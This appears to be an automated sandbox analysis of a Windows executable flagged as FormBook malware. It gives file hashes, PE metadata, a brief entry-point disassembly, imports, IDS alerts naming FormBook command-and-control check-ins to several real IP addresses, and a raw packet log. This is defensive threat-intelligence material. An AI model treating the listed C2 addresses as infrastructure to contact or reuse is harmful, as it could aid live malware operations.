                                                                                                                                                                                    SSDEEP:6144:mp+ggf0T+/tfoEgU7EahqmfzuBdlz9bCcFTlveB3SfCDjVKz:S60T+JoEeahxfidPbJTgCfCnVKz
                                                                                                                                                                                    TLSH:1CD407C1B8E4F717C0A449B7F15616FB17350CA9A2586DE1C0DCBB7B31BE912A1CB226
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...5.oZ.................f...*.....
                                                                                                                                                                                    Icon Hash:00f0d8e0a4e47083
                                                                                                                                                                                    Entrypoint:0x4034a5
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x5A6FED35 [Tue Jan 30 03:57:41 2018 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                                                                                                    Instruction
                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    push esi
                                                                                                                                                                                    push edi
                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                    pop edi
                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                    call dword ptr [004080ACh]
                                                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                                                                                                                    je 00007F9BA0C538A3h
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call 00007F9BA0C56B6Dh
                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                    je 00007F9BA0C53899h
                                                                                                                                                                                    push 00000C00h
                                                                                                                                                                                    call eax
                                                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                                                    push esi
                                                                                                                                                                                    call 00007F9BA0C56AE7h
                                                                                                                                                                                    push esi
                                                                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                                                    jne 00007F9BA0C5387Ch
                                                                                                                                                                                    push 0000000Ah
                                                                                                                                                                                    call 00007F9BA0C56B40h
                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                    call 00007F9BA0C56B39h
                                                                                                                                                                                    push 00000006h
                                                                                                                                                                                    mov dword ptr [0042A244h], eax
                                                                                                                                                                                    call 00007F9BA0C56B2Dh
                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                    je 00007F9BA0C538A1h
                                                                                                                                                                                    push 0000001Eh
                                                                                                                                                                                    call eax
                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                    je 00007F9BA0C53899h
                                                                                                                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                                                                                                                    push ebp
                                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                    push eax
                                                                                                                                                                                    push ebx
                                                                                                                                                                                    push 004216E8h
                                                                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                                                                    push 0040A384h
                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x586c8.rsrc
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x64090x6600False0.6540287990196079data6.416222666400958IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x80000x138e0x1400False0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0xa0000x203580x600False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .ndata0x2b0000x3e0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                    .rsrc0x690000x586c80x58800False0.15459205067090395data3.9804986707601797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                    RT_ICON0x692f80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xab3200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xbbb480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xbe0f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xbf1980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xc00400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_ICON0xc09c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                                                                                                                                                                                    RT_DIALOG0xc0e300x100dataEnglishUnited States
                                                                                                                                                                                    RT_DIALOG0xc0f300x11cdataEnglishUnited States
                                                                                                                                                                                    RT_DIALOG0xc10500x60dataEnglishUnited States
                                                                                                                                                                                    RT_GROUP_ICON0xc10b00x68dataEnglishUnited States
                                                                                                                                                                                    RT_VERSION0xc11180x270dataEnglishUnited States
                                                                                                                                                                                    RT_MANIFEST0xc13880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                    192.168.11.20192.185.32.15749893802031449 11/21/22-19:24:07.554896TCP2031449ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20192.185.32.15749837802031453 11/21/22-19:20:48.332938TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20185.101.158.23949867802031449 11/21/22-19:22:29.555793TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    192.168.11.20192.185.32.15749837802031412 11/21/22-19:20:48.332938TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20194.245.148.18949863802031449 11/21/22-19:22:18.340101TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    192.168.11.2045.130.41.2449885802031412 11/21/22-19:23:43.670047TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988580192.168.11.2045.130.41.24
                                                                                                                                                                                    192.168.11.20103.63.2.17549909802031449 11/21/22-19:25:04.539756TCP2031449ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.20194.245.148.18949863802031453 11/21/22-19:22:18.340101TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    192.168.11.2045.130.41.2449885802031453 11/21/22-19:23:43.670047TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988580192.168.11.2045.130.41.24
                                                                                                                                                                                    192.168.11.2045.130.41.2449829802031453 11/21/22-19:20:23.527011TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    192.168.11.20103.63.2.17549855802031449 11/21/22-19:21:46.471516TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.2045.130.41.2449829802031412 11/21/22-19:20:23.527011TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    192.168.11.20192.185.32.15749837802031449 11/21/22-19:20:48.332938TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20185.101.158.23949867802031453 11/21/22-19:22:29.555793TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    192.168.11.20185.101.158.23949867802031412 11/21/22-19:22:29.555793TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    192.168.11.201.1.1.149583532014169 11/21/22-19:20:17.053336UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4958353192.168.11.201.1.1.1
                                                                                                                                                                                    192.168.11.20192.185.32.15749893802031412 11/21/22-19:24:07.554896TCP2031412ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20194.245.148.18949863802031412 11/21/22-19:22:18.340101TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    192.168.11.20103.63.2.17549909802031453 11/21/22-19:25:04.539756TCP2031453ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.20192.185.32.15749893802031453 11/21/22-19:24:07.554896TCP2031453ET TROJAN FormBook CnC Checkin (GET)4989380192.168.11.20192.185.32.157
                                                                                                                                                                                    192.168.11.20103.63.2.17549909802031412 11/21/22-19:25:04.539756TCP2031412ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.20103.63.2.17549855802031412 11/21/22-19:21:46.471516TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.20103.63.2.17549855802031453 11/21/22-19:21:46.471516TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    192.168.11.2045.130.41.2449829802031449 11/21/22-19:20:23.527011TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.2045.130.41.24
                                                                                                                                                                                    192.168.11.2045.130.41.2449885802031449 11/21/22-19:23:43.670047TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988580192.168.11.2045.130.41.24
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Nov 21, 2022 19:18:35.512015104 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.512032986 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.512219906 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.527648926 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.527656078 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.559667110 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.559830904 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.560410023 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.560631990 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.674057007 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.675178051 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.675458908 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.679795980 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.724400997 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.987910032 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988135099 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988198996 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988365889 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988368034 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988420010 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988446951 CET44349818142.250.185.78192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988573074 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:35.988631010 CET49818443192.168.11.20142.250.185.78
                                                                                                                                                                                    Nov 21, 2022 19:18:36.162713051 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.162734032 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.162869930 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.163229942 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.163243055 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.200342894 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.200512886 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.200512886 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.200982094 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.201127052 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.201127052 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.204843998 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.204852104 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.205075979 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.205310106 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.205832958 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.248399973 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.520715952 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.520903111 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.520958900 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.521121025 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.521485090 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.521732092 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.521774054 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.522655964 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.523052931 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.523277044 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.523518085 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.523547888 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.523700953 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524049997 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524411917 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524449110 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524732113 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524749041 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.524954081 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.530770063 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531084061 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531124115 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531151056 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531385899 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531423092 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531554937 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531584024 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531851053 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.531908989 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.532114029 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.532444000 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.532922983 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.532943964 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.532989979 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.533113956 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.533298016 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.533328056 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.533518076 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.533776045 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534084082 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534107924 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534270048 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534423113 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534629107 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534684896 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.534890890 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.535197020 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.535408974 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.535465002 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.535643101 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.535952091 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536113977 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536174059 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536338091 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536554098 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536755085 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536812067 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.536992073 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537206888 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537380934 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537417889 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537600040 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537626982 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537775040 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537805080 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.537916899 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538085938 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538284063 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538317919 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538465023 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538482904 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538626909 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.538992882 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.539180040 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.539210081 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.539391994 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.539410114 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.539650917 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540033102 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540226936 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540261984 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540462971 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540518045 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.540759087 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541218996 CET44349819142.250.185.161192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541446924 CET49819443192.168.11.20142.250.185.161
                                                                                                                                                                                    Nov 21, 2022 19:18:36.541487932 CET44349819142.250.185.161192.168.11.20
